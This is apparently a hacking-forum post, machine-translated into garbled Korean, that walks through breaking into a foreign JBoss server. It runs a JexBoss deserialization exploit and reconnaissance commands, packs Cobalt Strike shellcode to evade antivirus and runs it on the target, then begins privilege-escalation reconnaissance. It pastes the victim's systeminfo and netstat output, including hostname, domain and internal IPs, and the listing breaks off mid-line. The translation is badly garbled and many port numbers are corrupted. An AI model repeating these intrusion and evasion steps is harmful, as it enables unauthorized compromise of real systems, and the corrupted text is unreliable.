KoreanHackerTeam
Moderator
工具准备
Jexboss칼리 리눅스
CS 4.3
Windows Killer Online Query One
Windows Killer Online Query 2
Windows Killer Online Query 3
fscan
조수 쉘 코드 프리 킬
lstar
코발트 스트라이크를위한 다른 플러그인
Peass-Ng
인쇄기
外网打点
1. 인트라넷의 수평 방향을 연습하기 위해 외국 사이트에 조용히 집중하십시오.2. Jboss 웹 사이트에 사막화 취약성이 있음을 발견했습니다. 예, JexBoss는 성공적으로 사용할 수 없습니다.
Python jexboss.py -u https://xx.xx.xx/3. 6 명의 형제가 성공적으로 활용 한 사막화를위한 궁극적 인 테스트 도구
4. 현재 사용자 Whoami, 일반 사용자를 확인하십시오
5. IP 주소 ipconfig를 확인하십시오
6. 킬러 작업 목록 /SVC가 있는지 확인하십시오
7. 쿼리 콘텐츠를 Windows에 붙여 넣는 소프트 온라인 쿼리를 죽이고 부드럽게 죽이는 것을 발견하십시오.
8. 서버가 네트워크에서 벗어난지 www.baidu.com에서 벗어나는 지 확인하십시오. 서버가 네트워크를 벗어났습니다
CS上线
1. 소프트 킬링 소프트웨어가 있기 때문에 우회하는 것을 고려해야합니다. CS Trojan을 직접 업로드하는 것은 불가능합니다. 이번에는 조수 쉘 코드가 죽지 않습니다. github에서 Python을 사용하여 포장 된 많은 EXE 파일이 너무 커서 매우 느리게 업로드되기 때문에 조수 쉘 코드는 죽지 않고 업로드가 더 빠르기 때문입니다.2. CS는 C 언어로 쉘 코드가됩니다
3. Shellcode 컨텐츠를 Tidal 웹 사이트에 복사하고 생성 된 EXE를 대상 시스템에 업로드 한 다음 명령을 실행하십시오.
C: \\ usr \\ desarrollo \\ jboss-5.1.0.ga \\ server \\ sigameserver \\ deploy \\ root.war \\ tideav-go1-2023-02-04-10-31-21-21261.exe 조수
4. CS가 성공적으로 시작되었습니다
权限提升
信息收集
1. 현재 사용자 및 권한을 봅니다우와미
Whoami /Priv
2. 시스템 버전 및 패치 정보를 봅니다
SystemInfo
nombre de host: Ameprowebegad
Nombre del Sistema OperatingVO: Microsoft Windows 10 Pro
Versi ¢ n del sistema operativo: 10.0.19044 N/D Compilaci ¢ n 19044
Fabricante del Sistema OperatingVO: Microsoft Corporation
configuraci ¢ n del sistema operativo: Estaci ¢ n de trabajo miembro
tipo de compilaci ¢ n del sistema operativo: 멀티 프로세서 무료
제안 DE: AppZusr
organizaci ¢ n registrada:
ID. DEL ProductO: 00331-10000-00001-AA727
Fecha de instalaci ¢ n Original: 13/5/2022, 14:03:47
Tiempo de Arranque del Sistema: 1/2/2023, 16:50:29
Fabricante del Sistema: VMware, Inc.
Modelo El Sistema: VMware 가상 플랫폼
Tipo de Sistema: x64 기반 PC
Procesador (ES) : 2 Procesadores instalados.
[01] : Intel64 Family 6 Model 85 Stepping 7 Genuineintel ~ 2494 MHz
[02] : Intel64 Family 6 Model 85 Stepping 7 Genuineintel ~ 2494 MHz
Versi ¢ n del biOS: Phoenix Technologies Ltd 6.00, 12/11/2020
Directorio de Windows: C: \ Windows
Directorio de sistema: C: \ Windows \ System32
lispositivo de arranque: \ device \ Harddiskvolume1
Configuraci ¢ N 지역 del sistema: EZS-MX; espa¤ol (m riculo)
Idioma de Entrada: es-mx; espa¤ol (m,xico)
Zona Horaria: (UTC-06:00) Guadalajara, Ciudad de M Ricolo, Monterrey
Cantidad Total de Memoria f, SICA: 4.095 MB
Memoria f, SICA Disponable: 1.201 MB
Memoria Virtual: Tama¤o M Ximo: 4.799 MB
Memoria Virtual: Disponable: 1.147 MB
Memoria Virtual: EN USO: 3.652 MB
Ubicaci ¢ n (es) de Archivo de Paginaci ¢ n: C: \ pagefile.sys
Dominio: Ame.local
Servidor de inicio de sesi ¢ n: \\ Ameprowebegad
Revisi ¢ n (es) : 4 Revisi ¢ n (es) instaladas.
[01] : KB5004331
[02] : KB5003791
[03] : KB5006670
[04] : KB5005699
Tarjeta (s) de red: 1 Tarjetas de Interfaz de Red instaladas.
Z [01] : Intel (R) Pro/1000 MT 네트워크 연결
Nombre de conexi ¢ N: Ethernet0
DHCP HABILITADO: NO
Direcciones IP
[01] : 172.16.2.100
[02] : Fe80333333333333333333333333333333:eee1:888e
hyper-v: SE가 ¢ un hippervisor를 감지해야합니다. NO MOSTR N LAS CARACTER ¡ STICAS 필수 PARA HYPER -V.3, OPEN PORT SERVICE NETSTAT -ONO보기
Conexiones activas
Proto Direcci ¢ n Local Direcci ¢ n Remota Estado Pid
TCP 0.0.0.0:135 0.0.0.0:0 청취 600
TCP 0.0.0.0:445 0.0.0.0:0 청취 4
TCP 0.0.0.0:1090 0.0.0.0:0 청취 7600
TCP 0.0.0.0:1098 0.0.0.0:0 청취 7600
TCP Z 0.0.0.0:1099 0.0.0.0:0 청취 7600
TCP 0.0.0.033603389 0.0.0.0:0 청취 1072
TCP 0.0.0.033603873 0.0.0.0:0 청취 7600
TCP 0.0.0.0:4444 0.0.0.0:0 청취 7600
TCP 0.0.0.0:4445 0.0.0.0:0 청취 7600
TCP 0.0.0.033604446 0.0.0.0:0 청취 7600
TCP 0.0.0.033604457 0.0.0.0:0 청취 7600
TCP 0.0.0.033604712 0.0.0.0:0 청취 7600
TCP 0.0.0.0:4713 0.0.0.0:0 청취 7600
TCP 0.0.0.0:5040 0.0.0.0:0 청취 6652
TCP 0.0.0.033605985 0.0.0.0:0 청취 4
TCP 0.0.0.033607070 0.0.0.0:0 청취 3564
TCP 0.0.0.0:8009 0.0.0.0:0 청취 7600
TCP 0.0.0.0:8080 0.0.0.0:0 Z 청취 7600
TCP 0.0.0.033608083 0.0.0.0:0 청취 7600
TCP 0.0.0.0336046305 0.0.0.0:0 청취 7600
TCP 0.0.0.0:47001 0.0.0.0:0 청취 4
TCP 0.0.0.0336049664 0.0.0.0:0 청취 832
TCP 0.0.0.0336049665 0.0.0.0:0 청취 680
TCP 0.0.0.0336049666 0.0.0.0:0 청취 1416
TCP 0.0.0.0.0336049667 0.0.0.0:0 청취 1612
TCP 0.0.0.0336049668 0.0.0.0:0 청취 2452
TCP 0.0.0.0336049671 0.0.0.0:0 청취 832
TCP 0.0.0.0336049672 0.0.0.0:0 청취 3404
TCP 0.0.0.0336049704 0.0.0.0:0 청취 820
TCP 0.0.0.0336049708 0.0.0.0:0 청취 3048
TCP 0.0.0.0336051407 0.0.0.0:0 청취 7600
TCP 127Z.0.0.1:5140 0.0.0.0:0 청취 7172
TCP 127.0.0.1:51411 0.0.0.0:0 청취 7600
TCP 172.16.2.100:139 0.0.0.0:0 청취 4
TCP 172.16.2.100:8080 172.16.12.34:42602 TIME_WAIT 0
TCP 172.16.2.100:8080 172.16.12.34:42610 설립 7600
TCP 172.16.2.100:8080 172.16.12.34:55672 TIME_WAIT 0
TCP 172.16.2.100:8080 172.16.12.34:55686 TIME_WAIT 0
TCP 172.16.2.100:49717 38.90.226.62:8883 설립 3576
TCP 172.16.2.100:50848 172.16.2.100:51407 TIME_WAIT 0
TCP 172.16.2.100:51413 172.16.2.190:1433 설립 7600
TCP 172.16.2.100:51447 172.16.2.190:1433 설립 7600
TCP 172.16.2.100:56063 172.16.2.11:2222 설립 3576
TCP 172.16.2.100:56538 92.223.66.48:443 설립 3564
TCP [:] :135 [:] :0 ListenInzg 600
TCP [:3360] :445 [:] :0 청취 4
TCP [:3360] :1090 [:] :0 청취 7600
TCP [:] :1098 [:] :0 청취 7600
TCP [:3360] :1099 [:] :0 청취 7600
TCP [:3360] :3389 [:] :0 청취 1072
TCP [:3360] :3873 [:] :0 청취 7600
TCP [:3360] :4444 [:] :0 청취 7600
TCP [:] :4445 [:] :0 청취 7600
TCP [:3360] :4446 [:] :0 청취 7600
TCP [:] :4457 [:] :0 청취 7600
TCP [:3360] :4712 [:] :0 청취 7600
TCP [:3360] :4713 [:] :0 청취 7600
TCP [:] :5985